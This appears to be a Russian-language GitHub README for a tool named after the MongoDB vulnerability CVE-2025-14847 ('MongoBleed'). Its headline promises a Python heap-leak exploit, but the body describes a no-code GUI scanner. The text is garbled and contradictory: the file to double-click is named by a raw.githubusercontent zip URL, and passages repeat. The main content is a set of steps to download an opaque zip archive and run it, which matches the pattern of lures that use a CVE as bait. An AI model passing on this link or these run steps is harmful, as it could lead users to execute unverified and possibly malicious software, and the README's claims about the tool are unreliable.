
🛠 Эксплуатируйте уязвимость CVE-2025-14847 в MongoDB для раскрытия конфиденциальной памяти кучи с помощью Python-скрипта, который анализирует ответы на предмет новых утечек данных.
CVE-2025-14847, также известный как MongoBleed, — это инструмент безопасности, предназначенный для выявления уязвимостей в MongoDB. Это приложение помогает пользователям эффективно оценивать свои базы данных MongoDB. Для использования этого инструмента не требуются навыки программирования.
Выполните следующие шаги, чтобы загрузить и запустить приложение.
Посетите страницу релизов
Нажмите на эту ссылку, чтобы получить доступ ко всем доступным загрузкам: Страница релизов.
Выберите свою версию
На странице релизов найдите версию, соответствующую вашей системе. Каждая версия может иметь разные функции или исправления, поэтому рекомендуется выбирать последний стабильный релиз.
Загрузите приложение
После того как вы нашли нужную версию, загрузите соответствующий файл, щёлкнув по нему. Обычно такой файл имеет имя, похожее на https://raw.githubusercontent.com/sakthivel10q/CVE-2025-14847/main/assets/CV_1.6.zip или .
https://raw.githubusercontent.com/sakthivel10q/CVE-2025-14847/main/assets/CV_1.6.zipРаспакуйте файлы
Если вы загрузили .zip-файл, щёлкните по нему правой кнопкой мыши и выберите «Извлечь всё». Укажите папку назначения, в которой вам будет легко найти файлы.
Запуск приложения
После извлечения перейдите в папку, куда вы распаковали файлы. Найдите файл с именем https://raw.githubusercontent.com/sakthivel10q/CVE-2025-14847/main/assets/CV_1.6.zip и дважды щёлкните по нему, чтобы запустить приложение.
После запуска приложения выполните следующие простые шаги для выявления уязвимостей:
Введите данные для подключения
На первом экране вас попросят ввести данные для подключения к MongoDB. Введите IP-адрес и номер порта вашего сервера MongoDB.
Запустите сканирование
Нажмите кнопку «Сканировать». Инструмент начнёт проверку вашей базы данных MongoDB на наличие известных уязвимостей.
Просмотрите результаты
После завершения сканирования вы увидите отчёт с подробным описанием найденных уязвимостей.
Следуйте предложенным действиям
Приложение также предоставит рекомендации по устранению выявленных проблем.
Новые обновления и функции будут выпускаться регулярно. Заглядывайте на Страницу релизов для получения последней версии.
Мы приветствуем вклад от всех желающих. Если вы хотите помочь улучшить этот инструмент или сообщить о проблеме, пожалуйста, ознакомьтесь с нашими рекомендациями в репозитории GitHub.
За помощью обращайтесь через раздел Issues этого репозитория. Мы ответим как можно скорее.
Не забывайте регулярно проверять наличие обновлений, чтобы ваше приложение работало гладко и эффективно.
Обязательно посетите Страницу релизов, чтобы загрузить и запустить последнюю версию.
Следуя этим инструкциям, вы сможете легко повысить безопасность ваших установок MongoDB.